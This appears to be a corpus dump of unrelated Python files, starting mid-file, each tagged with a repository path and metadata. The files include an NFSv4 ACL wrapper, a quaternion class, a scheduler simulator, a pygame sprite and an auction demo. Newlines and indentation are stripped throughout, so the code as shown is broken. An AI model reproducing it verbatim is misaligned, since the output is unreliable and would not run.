torch.sum(weighted_values, dim=0) else: future_utility = values.mean(dim=0) return immediate_utility + future_utility
7,281
ELDAmwl/backscatter/common/calibration/params.py
actris-scc/ELDAmwl
1
2167849
from addict import Dict from ELDAmwl.bases.base import Params from ELDAmwl.component.interface import IDBFunc from ELDAmwl.output.mwl_file_structure import MWLFileStructure from ELDAmwl.output.mwl_file_structure import MWLFileVarsFromDB from zope.component import queryUtility class BscCalibrationParams(Params): def __init__(self): super(BscCalibrationParams, self).__init__() self.cal_range_search_algorithm = None self.WindowWidth = None self.cal_value = None self.cal_interval = Dict({'min_height': None, 'max_height': None}) @classmethod def from_db(cls, general_params): result = cls() db_func = queryUtility(IDBFunc) query = db_func.get_bsc_cal_params_query(general_params.prod_id, general_params.product_type) result.cal_range_search_algorithm = \ query.BscCalibrOption.calRangeSearchMethod_ID result.window_width = \ float(query.BscCalibrOption.WindowWidth) result.cal_value = \ float(query.BscCalibrOption.calValue) result.cal_interval['min_height'] = \ float(query.BscCalibrOption.LowestHeight) result.cal_interval['max_height'] = \ float(query.BscCalibrOption.TopHeight) return result def equal(self, other): result = True if (self.cal_interval.min_height != other.cal_interval.min_height) or \ (self.cal_interval.max_height != other.cal_interval.max_height) or \ (self.window_width != other.window_width) or \ (self.cal_value != other.cal_value) or \ (self.cal_range_search_algorithm != other.cal_range_search_algorithm): result = False return result def to_meta_ds_dict(self, dct): """ writes parameter content into Dict for further export in mwl file Args: dct (addict.Dict): is a dict which will be converted into dataset. has the keys 'attrs' and 'data_vars' Returns: """ mwl_struct = MWLFileStructure() mwl_vars = MWLFileVarsFromDB() dct.data_vars.calibration_range_search_algorithm = \ mwl_vars.bsc_calibr_method_var(self.cal_range_search_algorithm) dct.data_vars.calibration_search_range = mwl_struct.cal_search_range_var(self.cal_interval) dct.data_vars.calibration_value = mwl_struct.bsc_calibr_value_var(self.cal_value)
2,512
machine-learning/solution/ml-classifiers-own.py
giserh/book-python
1
2168324
from sklearn import metrics from scipy.spatial.distance import euclidean as euclidean_distance from sklearn.model_selection import train_test_split from sklearn import datasets class NearestNeighborClassifier: def fit(self, features, labels): self.features_train = features self.labels_train = labels def predict(self, features_test): predictions = [] for row in features_test: label = self._closest(row) predictions.append(label) return predictions def _closest(self, row): current_best_dist = euclidean_distance(row, self.features_train[0]) best_index = 0 for i in range(0, len(self.features_train)): dist = euclidean_distance(row, self.features_train[i]) if dist < current_best_dist: current_best_dist = dist best_index = i return self.labels_train[best_index] dataset = datasets.load_iris() features = dataset.data labels = dataset.target data = train_test_split(features, labels, test_size=0.25, random_state=0) features_train = data[0] features_test = data[1] labels_train = data[2] labels_test = data[3] model = NearestNeighborClassifier() model.fit(features_train, labels_train) predictions = model.predict(features_test) accuracy = metrics.accuracy_score(labels_test, predictions) print(accuracy)
1,384
worker/notification/task/update_push_result.py
pjongy/jraze
5
2168886
import deserialize from common.logger.logger import get_logger from common.structure.job.messaging import DevicePlatform from common.structure.job.notification import NotificationSentResultMessageArgs from worker.notification.external.jraze.jraze import JrazeApi from worker.notification.task import AbstractTask logger = get_logger(__name__) class UpdatePushResultTask(AbstractTask): def __init__(self, jraze_api: JrazeApi): self.jraze_api: JrazeApi = jraze_api async def run(self, kwargs: dict): task_args: NotificationSentResultMessageArgs = deserialize.deserialize( NotificationSentResultMessageArgs, kwargs) if task_args.device_platform == DevicePlatform.IOS: await self.jraze_api.increase_notification_sent( notification_uuid=task_args.notification_uuid, ios=task_args.sent, ) elif task_args.device_platform == DevicePlatform.Android: await self.jraze_api.increase_notification_sent( notification_uuid=task_args.notification_uuid, android=task_args.sent, )
1,133
lab6/simulator.py
aostrun/RTC-Demos
0
2169552
import sys from task import Task, Scheduler from schedulers import * # Constants RMPA_STR = 'RMPA' EDF_STR = 'EDF' LLF_STR = 'LLF' SCHED_STR = 'SCHED' OPCE_STR = 'OPCE' if(len(sys.argv) <= 1): print("Please provide input file!") exit(1) elif(len(sys.argv) > 2): print("Too many arguments provided!") exit(1) filename = sys.argv[1] # Read lines from input file with open(filename, 'r') as file: lines = file.readlines() # There has to be at least 2 lines in the input file if(len(lines) < 2): print("Invalid file...") exit(1) # Split the first line and check simulator metadata #print(lines[0].split(' ')) info_split = lines[0].split() # Parse task data from input file tasks = list() for i in range(1, len(lines)): #print(lines[i]) if info_split[0] == OPCE_STR: task_split = lines[i].split(' ') task_id = int(task_split[0]) task_duration = int(task_split[1]) task = Task(task_id, 10000, task_duration) task.next_start = 100000 new_list = list() for k in range(2, len(task_split)): new_list.append(int(task_split[k])) task.wait = new_list else: task_split = lines[i].split(' ') task_period = int(task_split[0]) task_duration = int(task_split[1]) if info_split[0] == SCHED_STR: task_prio = int(task_split[2]) task_sched_type = task_split[3].rstrip() task = Task(i, task_period, task_duration, task_prio, task_sched_type) if task_sched_type == "RR": task.rr_remaining = int(info_split[2]) task.rr_period = task.rr_remaining else: task = Task(i, task_period, task_duration) tasks.append(task) #print(task_period.__str__() + ":" + task_duration.__str__()) scheduler = Scheduler(tasks) if info_split[0] == LLF_STR or info_split[0] == SCHED_STR: task_period = int(info_split[2]) scheduler.period = task_period # if(info_split[0] == RMPA_STR): print("RMPA Mode") rmpa_duration = int(info_split[1]) # Run RMPA simulation rmpa(rmpa_duration, scheduler) elif(info_split[0] == EDF_STR): print("EDF Mode") edf_duration = int(info_split[1]) # Run EDF simulation edf(edf_duration, scheduler) elif(info_split[0] == LLF_STR): print("LLF Mode") llf_duration = int(info_split[1]) llf_period = int(info_split[2]) # Run LLF simulation llf(llf_duration, llf_period, scheduler) elif(info_split[0] == SCHED_STR): print("SCHED Mode") # Run SCHED simulation sched_duration = int(info_split[1]) sched_period = int(info_split[2]) # Run LLF simulation sched(sched_duration, sched_period, scheduler) elif(info_split[0] == OPCE_STR): opce(160, scheduler) """ for task in tasks: print(task) for w in task.wait: print(w) """ else: print("Mode not supported!") exit(1) print("Simulation Done!\n")
2,974
Cadastro de Produtos/clientes/forms/pedido_forms.py
Drack112/Treina-Web-Django
0
2170722
from django import forms from ..models import Pedido, Cliente, Produto class PedidoForm(forms.ModelForm): cliente = forms.ModelChoiceField(queryset=Cliente.objects.all()) produtos = forms.ModelMultipleChoiceField(queryset=Produto.objects.all()) class Meta: model = Pedido fields = [ "cliente", "observacoes", "data_pedido", "valor", "status", "produtos", ]
468
rdl/column_transformers/StringTransformers.py
pageuppeople-opensource/relational-data-loader
2
2170553
class ToUpper: @staticmethod def execute(text_in): x = text_in.upper() return x class TrimWhiteSpace: @staticmethod def execute(text_in): return text_in.strip()
203
scripts/measure_dir.py
HReynaud/Morpho-MNIST
0
2167009
import argparse import multiprocessing import os from morphomnist import io, measure def measure_dir(data_dir, pool): for name in ['t10k', 'train']: in_path = os.path.join(data_dir, name + "-images-idx3-ubyte.gz") out_path = os.path.join(data_dir, name + "-morpho.csv") print(f"Processing MNIST data file {in_path}...") data = io.load_idx(in_path) df = measure.measure_batch(data, pool=pool, chunksize=100) df.to_csv(out_path, index_label='index') print(f"Morphometrics saved to {out_path}") def main(data_dirs): with multiprocessing.Pool() as pool: for data_dir in data_dirs: measure_dir(data_dir, pool) if __name__ == '__main__': parser = argparse.ArgumentParser(description="Morpho-MNIST - Measure an image directory") parser.add_argument('datadirs', nargs='+', help="one or more MNIST image directories to measure") args = parser.parse_args() print(args.datadirs) assert all(os.path.exists(data_dir) for data_dir in args.datadirs) main(args.datadirs)
1,096
quaternion/quat.py
IhorNehrutsa/micropython-samples
268
2168504
# quat.py "Micro" Quaternion class # Released under the MIT License (MIT). See LICENSE. # Copyright (c) 2020 <NAME> from math import sqrt, sin, cos, acos, isclose, asin, atan2, pi from array import array mdelta = 0.001 # 0.1% Minimum difference considered significant for graphics adelta = 0.001 # Absolute tolerance for components near 0 def _arglen(arg): length = 0 try: length = len(arg) except TypeError: pass if length not in (0, 3, 4): raise ValueError('Sequence length must be 3 or 4') return length # Convert a rotation quaternion to Euler angles. Beware: # https://github.com/moble/quaternion/wiki/Euler-angles-are-horrible def euler(q): # Return (heading, pitch, roll) if not q.isrot(): raise ValueError('Must be a rotation quaternion.') w, x, y, z = q pitch = asin(2*(w*y - x*z)) if isclose(pitch, pi/2, rel_tol = mdelta): return -2 * atan2(x, w), pitch, 0 if isclose(pitch, -pi/2, rel_tol = mdelta): return 2 * atan2(x, w), pitch, 0 roll = atan2(2*(w*x + y*z), w*w - x*x - y*y + z*z) #roll = atan2(2*(w*x + y*z), 1 - 2*(x*x + y*y)) hdg = atan2(2*(w*z + x*y), w*w + x*x - y*y - z*z) #hdg = atan2(2*(w*z + x*y), 1 - 2 *(y*y + z*z)) return hdg, pitch, roll class Quaternion: def __init__(self, w=1, x=0, y=0, z=0): # Default: the identity quaternion self.d = array('f', (w, x, y, z)) @property def w(self): return self[0] @w.setter def w(self, v): self[0] = v @property def x(self): return self[1] @x.setter def x(self, v): self[1] = v @property def y(self): return self[2] @y.setter def y(self, v): self[2] = v @property def z(self): return self[3] @z.setter def z(self, v): self[3] = v def normalise(self): if self[0] == 1: # acos(1) == 0. Identity quaternion: no rotation return Quaternion(1, 0, 0, 0) m = abs(self) # Magnitude assert m > 0.1 # rotation quaternion should have magnitude ~= 1 if isclose(m, 1.0, rel_tol=mdelta): return self # No normalisation necessary return Quaternion(*(a/m for a in self)) def __getitem__(self, key): return self.d[key] def __setitem__(self, key, v): try: v1 = array('f', v) except TypeError: # Scalar v1 = v self.d[key] = v1 def copy(self): return Quaternion(*self) def __abs__(self): # Return magnitude return sqrt(sum((d*d for d in self))) def __len__(self): return 4 # Comparison: == and != perform equality test of all elements def __eq__(self, other): return all((isclose(a, b, rel_tol=mdelta, abs_tol=adelta) for a, b in zip(self, other))) def __ne__(self, other): return not self == other # < and > comparisons compare magnitudes. def __gt__(self, other): return abs(self) > abs(other) def __lt__(self, other): return abs(self) < abs(other) # <= and >= return True for complete equality otherwise magnitudes are compared. def __ge__(self, other): return True if self == other else abs(self) > abs(other) def __le__(self, other): return True if self == other else abs(self) < abs(other) def to_angle_axis(self): q = self.normalise() if isclose(q[0], 1.0, rel_tol = mdelta): return 0, 1, 0, 0 theta = 2*acos(q[0]) s = sin(theta/2) return [theta] + [a/s for a in q[1:]] def conjugate(self): return Quaternion(self[0], *(-a for a in self[1:])) def inverse(self): # Reciprocal return self.conjugate()/sum((d*d for d in self)) def __str__(self): return 'w = {:4.2f} x = {:4.2f} y = {:4.2f} z = {:4.2f}'.format(*self) def __pos__(self): return Quaternion(*self) def __neg__(self): return Quaternion(*(-a for a in self)) def __truediv__(self, scalar): if isinstance(scalar, Quaternion): # See docs for reason raise ValueError('Cannot divide by Quaternion') return Quaternion(*(a/scalar for a in self)) def __rtruediv__(self, other): return self.inverse() * other # Multiply by quaternion, list, tuple, or scalar: result = self * other def __mul__(self, other): if isinstance(other, Quaternion): w1, x1, y1, z1 = self w2, x2, y2, z2 = other w = w1*w2 - x1*x2 - y1*y2 - z1*z2 x = w1*x2 + x1*w2 + y1*z2 - z1*y2 y = w1*y2 - x1*z2 + y1*w2 + z1*x2 z = w1*z2 + x1*y2 - y1*x2 + z1*w2 return Quaternion(w, x, y, z) length = _arglen(other) if length == 0: # Assume other is scalar return Quaternion(*(a * other for a in self)) elif length == 3: return Quaternion(0, *(a * b for a, b in zip(self[1:], other))) # length == 4: return Quaternion(*(a * b for a, b in zip(self, other))) def __rmul__(self, other): return self * other # Multiplication by scalars and tuples is commutative def __add__(self, other): if isinstance(other, Quaternion): return Quaternion(*(a + b for a, b in zip(self, other))) length = _arglen(other) if length == 0: # Assume other is scalar return Quaternion(self[0] + other, *self[1:]) # ? Is adding a scalar meaningful? elif length == 3: return Quaternion(0, *(a + b for a, b in zip(self[1:], other))) # length == 4: return Quaternion(*(a + b for a, b in zip(self, other))) def __radd__(self, other): return self.__add__(other) def __sub__(self, other): if isinstance(other, Quaternion): return Quaternion(*(a - b for a, b in zip(self, other))) length = _arglen(other) if length == 0: # Assume other is scalar return Quaternion(self[0] - other, *self[1:]) # ? Is this meaningful? elif length == 3: return Quaternion(0, *(a - b for a, b in zip(self[1:], other))) # length == 4: return Quaternion(*(a - b for a, b in zip(self, other))) def __rsub__(self, other): return other + self.__neg__() # via __radd__ def isrot(self): return isclose(abs(self), 1.0, rel_tol = mdelta) def isvec(self): return isclose(self[0], 0, abs_tol = adelta) def __matmul__(self, rot): return rot * self * rot.conjugate() def rrot(self, rot): return rot.conjugate() * self * rot # A vector quaternion has real part 0. It can represent a point in space. def Vector(x, y, z): return Quaternion(0, x, y, z) Point = Vector # A rotation quaternion is a unit quaternion i.e. magnitude == 1 def Rotator(theta=0, x=0, y=0, z=0): s = sin(theta/2) m = sqrt(x*x + y*y + z*z) # Convert to unit vector if m > 0: return Quaternion(cos(theta/2), s*x/m, s*y/m, s*z/m) else: return Quaternion(1, 0, 0, 0) # Identity quaternion def Euler(heading, pitch, roll): cy = cos(heading * 0.5); sy = sin(heading * 0.5); cp = cos(pitch * 0.5); sp = sin(pitch * 0.5); cr = cos(roll * 0.5); sr = sin(roll * 0.5); w = cr * cp * cy + sr * sp * sy; x = sr * cp * cy - cr * sp * sy; y = cr * sp * cy + sr * cp * sy; z = cr * cp * sy - sr * sp * cy; return Quaternion(w, x, y, z) # Tait-Bryan angles but z == towards sky
7,557
GUItest.py
migzpogi/PokerCalculator
4
2170595
from flask import Flask, render_template, request app = Flask(__name__) app.debug = True @app.route('/', methods=['GET']) def dropdown(): colours = ['Red', 'Blue', 'Black', 'Orange'] return render_template('test.html', colours=colours) if __name__ == "__main__": app.run()
287
shared/qpg_defaults.py
byu-imaal/dns-cookies-pam21
0
2170281
"""Default QnameComponent extensions that are included in the base QueryParserGenerator class""" import base64 import binascii import random import socket import string import struct import time from shared.qpg_component_base import QnameComponent class QnameKeyword(QnameComponent): id = "$key" exceptions = [] @classmethod def generate(cls, val) -> str: return str(val) class QnameIP(QnameComponent): id = "$ip" exceptions = [socket.error, binascii.Error, OSError] @classmethod def generate(cls, ip_addr): if ':' in ip_addr: return base64.b32encode(socket.inet_pton(socket.AF_INET6, ip_addr))[:-6].lower().decode() else: return base64.b32encode(socket.inet_pton(socket.AF_INET, ip_addr))[:-1].lower().decode() @classmethod def parse(cls, label): if len(label) > 7: return socket.inet_ntop(socket.AF_INET6, base64.b32decode('{}======'.format(label).upper())) else: return socket.inet_ntop(socket.AF_INET, base64.b32decode('{}='.format(label).upper())) class QnameTimestamp(QnameComponent): id = "$ts" exceptions = [binascii.Error, struct.error] @classmethod def generate(cls, timestamp: float = None) -> str: if timestamp is None: timestamp = time.time() return base64.b32encode(struct.pack(">I", int(timestamp)))[:-1].lower().decode() @classmethod def parse(cls, label: str) -> int: return struct.unpack('>I', base64.b32decode(label + '=', casefold=True))[0] class QnameMicroSeconds(QnameComponent): id = "$tsu" exceptions = [] @classmethod def generate(cls, timestamp: float = None) -> str: if timestamp is None: timestamp = time.time() return str(int(10000000 * (timestamp - int(timestamp)))) @classmethod def parse(cls, label: str) -> int: return int(label) class QnameHostname(QnameComponent): id = "$host" exceptions = [socket.error] @classmethod def generate(cls) -> str: return socket.gethostname() class QnameUnique(QnameComponent): """ This class is NOT thread-safe. If multithreading is needed, pre-generate the qnames serially """ id = "$uniq" exceptions = [] __num = 0 @classmethod def generate(cls) -> str: cls.__num += 1 return str(cls.__num) class QnameRandomAlpha(QnameComponent): id = "$randalpha" exceptions = [] @classmethod def generate(cls, length: int = 8) -> str: return ''.join(random.choice(string.ascii_lowercase) for _ in range(length)) class QnameRandomNumeric(QnameComponent): id = "$randnum" exceptions = [] @classmethod def generate(cls, length: int = 8) -> str: return ''.join(random.choice(string.digits) for _ in range(length)) class QnameRandomAlphaNumeric(QnameComponent): id = "$randalphanum" exceptions = [] ascii_lower_digits = string.ascii_lowercase + string.digits @classmethod def generate(cls, length: int = 8) -> str: return ''.join(random.choice(cls.ascii_lower_digits) for _ in range(length)) class QnameRandomBase32(QnameComponent): id = "$randb32" exceptions = [] @classmethod def generate(cls, timestamp: float = None) -> str: if timestamp is None: timestamp = time.time() timestamp = int(timestamp * 100000) b32 = base64.b32encode(struct.pack('>Q', timestamp)).decode().lower() slc = slice(0, b32.index('=')) b32 = b32[slc] return ''.join(random.sample(b32, len(b32)))
3,632
src/nfs4_share/acl.py
AlexJanse/network-filesystem-shares
0
2169545
import os import re import pwd import grp import subprocess import logging # Basic paths to binaries getfacl_bin = "/usr/bin/nfs4_getfacl" setfacl_bin = "/usr/bin/nfs4_setfacl" def assert_command_exists(command_path): assert os.path.isfile(command_path) and os.access(command_path, os.X_OK), "Reading the nfs4 access-control list " \ "requires the executable binary '%s'" % \ command_path class AccessControlList: """ Representation of an NFSv4 ACL (LIST) """ def __init__(self, entries): if type(entries) not in [set, list]: raise TypeError("Entries should be a set or list") self.entries = entries def __repr__(self): return ",".join([repr(i) for i in self.entries]) def __eq__(self, other): return self.entries == other.entries def __iter__(self): return iter(self.entries) def __sub__(self, other): # self - other first_index, last_index = find_sub_list(other.entries, self.entries) if first_index is None: # No sublist was found return self new_acl = AccessControlList(self.entries[:first_index]+self.entries[last_index+1:]) return new_acl def __add__(self, other): new_acl = AccessControlList(self.entries + other.entries) return new_acl @classmethod def from_file(cls, filename): """Calls the nfs4_getfacl binaries via CLI to get ACEs""" global getfacl_bin assert_command_exists(getfacl_bin) try: output = subprocess.check_output([getfacl_bin, filename], stderr=subprocess.STDOUT) except subprocess.CalledProcessError as e: logging.error(e.cmd) logging.error(e.stdout.decode()) logging.error(e.stderr.decode()) raise e entries = [] for line in nonblank_lines(output.decode().split("\n")): if line.startswith('#'): continue entry = AccessControlEntity.from_string(line, filename=filename) entries.append(entry) if len(entries) == 0: raise OSError("Could not get ACLs from file \'%s\'" % filename) return cls(entries) def append(self, *args, **kwargs): self._change_nfs4('-a', *args, **kwargs) def set(self, *args, **kwargs): self._change_nfs4('-s', *args, **kwargs) def unset(self, *args, **kwargs): self._change_nfs4('-x', *args, **kwargs) def _change_nfs4(self, action, target, recursive=False, test=False): """ Calls the nfs4_setfacl binaries via CLI to change permissions """ logging.debug("Changing permissions (%s) on %s (recursive=%s)" % (action, target, recursive)) global setfacl_bin assert_command_exists(setfacl_bin) command = [setfacl_bin] if recursive: command.append('-R') if test: command.append('--test') command.append(action) command.extend([repr(self), target]) try: subprocess.check_output(command, stderr=subprocess.STDOUT) except subprocess.CalledProcessError as e: logging.error("Subprocess: %s" % e.cmd) logging.error("Subprocess: %s" % e.output.decode()) raise e class AccessControlEntity: """ Representation of an NFSv4 ACE (Entity) """ ace_spec = "{entry_type}:{flags}:{identity}@{domain}:{permissions}" def __init__(self, entry_type, flags, identity, domain, permissions): self.entry_type = entry_type self.flags = flags self.identity = identity self.domain = domain self.permissions = permissions def __repr__(self): return self.ace_spec.format( entry_type=self.entry_type, flags=self.flags, identity=self.identity, domain=self.domain, permissions=self.permissions) def __str__(self): return repr(self) def __eq__(self, other): if self.entry_type != other.entry_type \ or self.flags != other.flags \ or self.domain != other.domain \ or self.identity != other.identity: return False if len(self.permissions) != len(other.permissions): return False for perm in self.permissions: if perm not in other.permissions: return False return True @property def permissions(self): return self._permissions @permissions.setter def permissions(self, value): for letter in value: if letter in ['R', 'W', 'X']: raise NotImplementedError("Upper-case permissions are not allowed (%s) [R->rtncy, W->waDtTNcCy, " "X->xtcy]" % value) self._permissions = value @classmethod def from_string(cls, string, filename=None): """ Returns a AccessControlEntity tat is based on a string. A filename is required if one wants to translate special principal """ components = string.split(':') entry_type = components[0] flags = components[1] principal = components[2] if principal in ['OWNER@', 'GROUP@', 'EVERYONE@']: assert filename is not None, "filename is required to make a special principal translation!" identity, domain, flags = cls.translate_special_principals(principal, filename, flags) else: split = principal.split('@') identity = split[0] domain = split[1] permissions = components[3] return cls(entry_type, flags, identity, domain, permissions) @staticmethod def translate_special_principals(principal, filename, flags): """ Translates a special principal to the actual user / group name. NFS4 share domain is taken from /etc/idmapd.conf and falls back on `dnsdomainname`. Returns identity, domain and flags""" domain = get_nfs4_domain() stat_info = os.stat(filename) if 'OWNER@' == principal: uid = stat_info.st_uid user = pwd.getpwuid(uid)[0] return user, domain, flags elif 'GROUP@' == principal: gid = stat_info.st_gid group = grp.getgrgid(gid)[0] flags = flags+'g' return group, domain, flags elif 'EVERYONE@' == principal: return "EVERYONE", '', flags else: raise NotImplementedError("Cannot translate %s" % principal) def get_nfs4_domain(): domain = subprocess.run(['egrep', '-s', '^Domain', '/etc/idmapd.conf'], stdout=subprocess.PIPE).stdout.decode('utf-8').rstrip() try: domain = re.search('[a-z\\.\\-]+$', domain).group(0) except AttributeError: pass if len(domain) == 0: domain = subprocess.run(['dnsdomainname'], stdout=subprocess.PIPE).stdout.decode('utf-8').rstrip() return (domain) def nonblank_lines(f): for line in f: line = line.rstrip() if line: yield line def find_sub_list(sublist, mainlist): sublist_length = len(sublist) for index in (i for i, e in enumerate(mainlist) if e == sublist[0]): if mainlist[index:index + sublist_length] == sublist: return index, index+sublist_length-1 return None, None
7,560
core/action.py
pistonsky/trello-standup-bot
0
2170296
import datetime import pytz class Action: def __init__(self, action, timezone): self.action = action self.timezone = timezone def __str__(self): if self.action['type'] == 'addMemberToCard': return('{id} added to {name} at {time}'.format( id=self.action['data']['card']['id'], name=self.action['data']['card']['name'], time=pytz.timezone('utc').localize(datetime.datetime.strptime(self.action['date'][:19], '%Y-%m-%dT%H:%M:%S')).astimezone(pytz.timezone(self.timezone)).strftime('%A %-I:%M %p'))) if self.action['type'] == 'removeMemberFromCard': return('{id} removed from {name} at {time}'.format( id=self.action['data']['card']['id'], name=self.action['data']['card']['name'], time=pytz.timezone('utc').localize(datetime.datetime.strptime(self.action['date'][:19], '%Y-%m-%dT%H:%M:%S')).astimezone(pytz.timezone(self.timezone)).strftime('%A %-I:%M %p'))) def __sub__(self, other): action_a = self.action action_b = other duration = datetime.datetime.strptime(action_a['date'][:19], '%Y-%m-%dT%H:%M:%S') - datetime.datetime.strptime(action_b['date'][:19], '%Y-%m-%dT%H:%M:%S') raw_seconds = duration.seconds + duration.days*24*3600 if raw_seconds < 0: raw_seconds *= -1 return raw_seconds def match(self, another_action): return another_action['type'] != self.action['type'] and another_action['data']['card']['id'] == self.action['data']['card']['id']
1,594
push/management/commands/startbatches.py
nnsnodnb/djabaas
3
2170703
# coding=utf-8 from django.conf import settings from django.core.management.base import BaseCommand, CommandError from push.models import DeviceTokenModel, NotificationModel from datetime import datetime import os, os.path, sys sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '../../modules/') import push_notification class Command(BaseCommand): def __init__(self, *args, **kwargs): super(Command, self).__init__(*args, **kwargs) def handle(self, *args, **kwargs): now = '{0:%Y/%m/%d %H:%M}'.format(datetime.now()) notifications = NotificationModel.objects.filter(execute_datetime = now, is_sent = False, status = 0) for notification in notifications: device_tokens = DeviceTokenModel.objects.filter(os_version__gte = notification.os_version, username = notification.username) self.prepare_push_notification(notification, device_tokens) def prepare_push_notification(self, notification, device_tokens): device_token_lists = [] for item in device_tokens: device_token_lists.append(item.device_token) push_notification.execute(device_token_lists, notification)
1,358
challenges/k_difference_advanced.py
gioiab/py-collection
0
2170499
""" Created on 06/apr/2015 @author: gioia The script provides my solution to an advanced version of the "K difference" challenge. The challenge is about counting the total pairs of numbers whose difference is K in a list of N non-unique positive integers. Input: * the first line contains N (the number of positive integers) and K (the difference) * the second line contains the N integers Output: * the number of pairs whose difference is K Enjoy! """ def get_pairs(l, k): """ Given a list L of N positive integers, returns the count of the total pairs of numbers whose difference is K. First, each integer is stored into a dictionary along with its frequency. Then, for each integer I in the input list, the presence of the integer I+K is checked within the dictionary. The computational time complexity of the algorithm is still O(N). :param k: the given difference :type k: int :param l: the list of input integers :type l: list :return: the count of the total pairs of numbers whose difference is k :rtype: int """ hash_map = {} for i in l: hash_map[i] = hash_map.get(i, 0) + 1 return sum([hash_map[i + k] for i in l if hash_map.get(i + k)]) def main(): """ The main function of the program. It collects the inputs and calls the get_pairs function. """ _, k = map(int, raw_input().split()) l = map(int, raw_input().split()) print get_pairs(l, k) if __name__ == '__main__': """The entry point of the program. It simply calls the main function. """ main()
1,575
asteroid.py
borgaster/SpaceWarsEvolved
0
2169591
import math import random from loader import * import pygame from pygame.locals import * class Asteroid(pygame.sprite.Sprite): def __init__(self,num): pygame.sprite.Sprite.__init__(self) #Para garantir o maximo de aleatoriedade possivel listagem=[1,2,3,4,5,6,7,8,9,10] random.shuffle(listagem) random.shuffle(listagem) i=random.uniform(0,9) if listagem[int(i)] >= 3 and listagem[int(i)] <= 5: if listagem[int(i)] == 3: picture="asteroid_pekeno1.png" elif listagem[int(i)] == 4: picture="asteroid_pekeno2.png" else: picture="asteroid_pekeno3.png" self.hitpoints = 10 elif listagem[int(i)] < 3: if listagem[int(i)] >=1 and listagem[int(i)]<=2: picture="crazyAlien.gif" self.hitpoints = 20 else: picture="spaceGosma.png" self.hitpoints=15 else: listagem=[2,1] random.shuffle(listagem) if listagem[0]==1: picture="crazyDoc.png" self.hitpoints = 5 else: picture="crazyship1.gif" self.hitpoints = 11 self.image, self.rect = load_image(picture, -1) self.Sprite = pygame.sprite.RenderPlain(()) self.num = num self.screensize = [1120,840] modifier = random.randrange(0,2) if modifier == 0: modifier = -1 else: modifier = 1 multiplicador1 = (random.randrange(0,4)+1)*modifier modifier = random.randrange(0,2) if modifier == 0: modifier = -1 else: modifier = 1 multiplicador2 = (random.randrange(0,4)+1)*modifier self.vel = [multiplicador1, multiplicador2] #self.pos = [random.randrange(0,960)+40,random.randrange(0,660)+40] self.pos = [self.screensize[0]/2,-100] self.rect.center = self.pos def update(self): self.rect.move_ip(self.vel[0], self.vel[1]) # print "my coords: "+str(self.rect.center) self.pos[0] +=self.vel[0] self.pos[1] +=self.vel[1] if not -110 < self.pos[0] < self.screensize[0]: self.vel[0] = -self.vel[0] if not -110 < self.pos[1] < self.screensize[1]: self.vel[1] = -self.vel[1] def kill_asteroid(self): if self.hitpoints <=0: self.kill() return 1 return 0
2,627
stock/trade_reduction_demo_difference_gft0.py
dvirg/auctions
1
2170664
#!python3 """ Demonstration of a trade-reduction strongly-budget-balanced auction for a multi-lateral market with buyers, mediators and sellers (recipe: 1,1,1) Since: 2020-10 Author: <NAME> """ from markets import Market from agents import AgentCategory import trade_reduction_protocol from trade_reduction_protocol import budget_balanced_trade_reduction import random import logging trade_reduction_protocol.logger.setLevel(logging.INFO) def removeSeconds(prices, reduce_number): new_array = [] for i in range(len(prices)): if i % reduce_number != 0: new_array.append(prices[i]) return new_array print("\n\n###### RUNNING EXAMPLE FROM THE PAPER FOR TYPE (1,2,3,4): buyers-sellers-mediators") recipe = [1, 2, 3, 4] with_count = 1 without_count = 1 with_gft = 1 without_gft = 1 reduce_number = 1 while without_count == with_count: reduce_number += 1 buyers = [135.9, 136.7999, 143.5499, 144.0] sellers = [-18.95, -18.9, -17.95, -17.9, -17.7999, -17.7999, -17.2999, -17.0, -16.95, -16.7999, -15.15, -15.0, -15.0, -14.9, -14.2, -14.2, -14.1, -13.95] mediators = [-19.7, -19.6, -19.2999, -19.2999, -19.2999, -19.2, -18.9, -18.5, -18.5, -18.5, -18.0, -17.95, -17.9, -17.7999, -17.4, -17.4, -17.35, -17.35, -15.7, -15.7, -15.6, -15.1, -14.95, -14.85, -14.75, -14.65, -14.55, -14.55, -14.5, -13.95, -13.2, -13.2, -13.2, -12.75] mediatorsB = [-20.1, -20.0499, -19.6, -19.6, -19.5499, -19.5499, -19.45, -19.45, -19.4, -19.4, -19.1, -19.0, -19.0, -18.95, -18.7, -18.7, -18.45, -18.45, -17.9, -17.9, -17.85, -17.7, -17.45, -17.45, -17.2999, -17.2, -17.1, -17.1, -17.0499, -15.7, -15.25, -15.25, -15.25, -15.15, -14.95, -14.95, -14.95, -14.6, -14.55, -14.45, -14.45, -14.4, -14.15, -14.05, -13.75, -13.7, -13.15, -12.9, -12.9, -12.65] # # buyers = removeSeconds(buyers, reduce_number) # sellers = removeSeconds(sellers, reduce_number) # mediators = removeSeconds(mediators, reduce_number) # mediatorsB = removeSeconds(mediatorsB, reduce_number) # # random.shuffle(buyers) # random.shuffle(sellers) # random.shuffle(mediators) # random.shuffle(mediatorsB) market = Market([ AgentCategory("buyer", buyers), AgentCategory("seller", sellers), AgentCategory("mediator", mediators), AgentCategory("mediatorB", mediatorsB), ]) without_gft0 = budget_balanced_trade_reduction(market, recipe, False) with_gft0 = budget_balanced_trade_reduction(market, recipe, True) print(without_gft0) print(with_gft0) without_count = without_gft0.num_of_deals() with_count = with_gft0.num_of_deals() without_gft = without_gft0.gain_from_trade() with_gft = with_gft0.gain_from_trade() print('Compare: Without:', without_gft, "With:", with_gft) print('Compare: Without:', without_count, "With:", with_count) break # print(" buyers =", buyers) # print(" sellers =", sellers) # print(" mediators =", mediators) # print(" mediatorsB =", mediatorsB) # # print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: buyers-mediators-sellers") # market = Market([ # AgentCategory("buyer", buyers), # AgentCategory("mediator", mediators), # AgentCategory("seller", sellers), # ]) # print(budget_balanced_trade_reduction(market, recipe)) # # # print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: sellers-buyers-mediators") # market = Market([ # AgentCategory("seller", sellers), # AgentCategory("buyer", buyers), # AgentCategory("mediator", mediators), # ]) # print(budget_balanced_trade_reduction(market, recipe)) # # # # print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: sellers-mediators-buyers") # market = Market([ # AgentCategory("seller", sellers), # AgentCategory("mediator", mediators), # AgentCategory("buyer", buyers), # ]) # print(budget_balanced_trade_reduction(market, recipe)) # # # print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: mediators-sellers-buyers") # market = Market([ # AgentCategory("mediator", mediators), # 